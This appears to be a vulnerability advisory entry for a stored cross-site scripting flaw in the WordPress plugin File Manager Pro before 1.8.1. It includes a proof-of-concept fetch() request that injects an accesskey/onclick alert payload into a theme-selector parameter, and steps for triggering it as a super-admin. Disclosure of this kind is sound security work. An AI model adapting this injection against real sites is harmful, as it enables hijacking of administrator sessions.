Lucene search

K
wpexploitAlex SanfordWPEX-ID:81821BF5-69E1-4005-B3EB-D541490909CC
HistorySep 19, 2023 - 12:00 a.m.

File Manager Pro < 1.8.1 - Admin+ Stored Cross-Site Scripting

2023-09-1900:00:00
Alex Sanford
39
file manager pro
cross-site scripting
admin+ vulnerability
javascript
http request
access key combination
firefox
windows
linux
os x

0.0004 Low

EPSS

Percentile

14.2%

Description The plugin does not adequately validate and escape some inputs, leading to XSS by high-privilege users.

As an admin, open the File Manager and run the following JS code:

fetch("http://localhost:10008/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded; charset=UTF-8",
  },
  "body": "action=selector_themes&themesValue=dark-slim\"+accesskey=X+onclick=alert(/XSS/)+\"&nonce=" + wpData.nonce,
  "method": "POST",
  "mode": "cors",
  "credentials": "include"
});

As a super-admin, open the File Manager and press the Access Key combination (Firefox for Windows/Linux the key combination is ALT+SHIFT+X and on OS X it is CTRL+ALT+X) to trigger the XSS.

0.0004 Low

EPSS

Percentile

14.2%

Related for WPEX-ID:81821BF5-69E1-4005-B3EB-D541490909CC